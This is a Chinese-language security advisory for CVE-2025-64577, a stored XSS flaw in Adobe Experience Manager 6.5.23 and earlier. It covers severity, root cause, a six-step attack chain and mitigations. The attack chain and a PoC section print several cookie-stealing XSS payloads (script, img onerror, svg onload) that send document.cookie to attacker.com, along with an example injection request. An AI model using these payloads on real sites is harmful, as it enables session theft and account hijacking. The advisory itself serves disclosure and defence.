CVE-2025-64577 Adobe Experience Manager 存储型跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-64577

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

CVE-2025-64577是Adobe Experience Manager中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞影响Adobe Experience Manager 6.5.23及更早版本。漏洞允许低权限攻击者在易受攻击的表单字段中注入恶意脚本代码。由于是存储型XSS，恶意脚本会被永久保存在服务器端，当其他用户访问包含该字段的页面时，恶意JavaScript代码会在受害者浏览器中自动执行。攻击者可利用此漏洞窃取用户会话cookie、劫持用户账户、进行钓鱼攻击或修改页面内容。由于攻击需要低权限即可实施，且无需复杂的技术手段，因此该漏洞具有较高的实际威胁性。Adobe已于2025年12月10日发布安全公告并提供修复版本。

技术细节

该漏洞是典型的存储型跨站脚本漏洞，存在于Adobe Experience Manager的表单处理模块中。漏洞产生的根本原因是应用程序未能对用户输入进行充分的过滤和验证。当低权限用户在表单字段中提交数据时，恶意构造的JavaScript代码（如<script>alert(document.cookie)</script>）未被正确转义就直接存储到数据库中。其他用户访问相关页面时，这些未经过滤的数据被直接输出到HTML页面中，导致恶意脚本在用户浏览器上下文中执行。攻击者可以利用此漏洞获取受害者的认证令牌、会话ID或其他敏感信息，进而冒充合法用户进行操作。由于Adobe Experience Manager是企业级内容管理系统，广泛用于网站建设和数字资产管理，此类漏洞可能影响大量终端用户。

攻击链分析

STEP 1

步骤1：侦察与信息收集

攻击者首先访问目标Adobe Experience Manager网站，识别可用的表单字段和输入点，评估哪些字段存在输入验证缺陷。

STEP 2

步骤2：漏洞利用准备

攻击者准备恶意JavaScript payload，如<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>或其他窃取敏感信息的代码。

STEP 3

步骤3：注入恶意脚本

攻击者以低权限用户身份登录AEM系统，在表单字段中提交包含恶意脚本的输入数据。由于应用未进行充分过滤，该脚本被永久存储在服务器数据库中。

STEP 4

步骤4：等待受害者访问

恶意脚本存储后，攻击者等待其他用户（尤其是高权限用户）访问包含该表单字段的页面。

STEP 5

步骤5：脚本执行与数据窃取

当受害者浏览页面时，存储的恶意脚本被从服务器取出并嵌入到HTML响应中，在受害者浏览器中自动执行。攻击者通过脚本获取受害者的会话cookie、令牌或其他敏感信息。

STEP 6

步骤6：账户劫持

攻击者利用窃取的会话信息冒充受害者，可能进一步获取管理员权限或访问敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-64577 Stored XSS PoC for Adobe Experience Manager -->
<!-- This PoC demonstrates the stored XSS vulnerability in AEM form fields -->

<!-- Step 1: Inject malicious script into vulnerable form field -->
<!-- Replace TARGET_FORM_FIELD with actual field identifier -->
<script>
  // Malicious script to steal session cookies
  fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie))
</script>

<!-- Alternative payload using img tag with onerror event -->
<img src=x onerror="fetch('https://attacker.com/log?data='+document.cookie)">

<!-- Alternative payload using SVG element -->
<svg/onload=fetch('https://attacker.com/collect?c='+btoa(document.cookie))>

<!-- Step 2: When victim views the page containing the injected field, -->
<!-- the malicious script will execute in their browser context -->

<!-- Example POST request to inject payload -->
<!-- POST /content/forms/af TARGET_FORM_FIELD -->
<!-- _charset_=utf-8&TARGET_FORM_FIELD=<script>alert(document.domain)</script> -->

影响范围

Adobe Experience Manager <= 6.5.23

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1）限制低权限用户对表单编辑功能的访问权限；2）在Web应用防火墙（WAF）层面配置规则，检测并阻止包含XSS特征的请求；3）禁用或限制可能存在漏洞的表单字段功能；4）监视和审查用户提交的内容；5）应用Adobe官方提供的安全配置建议。但最有效的修复方式仍是尽快升级到官方发布的安全修复版本。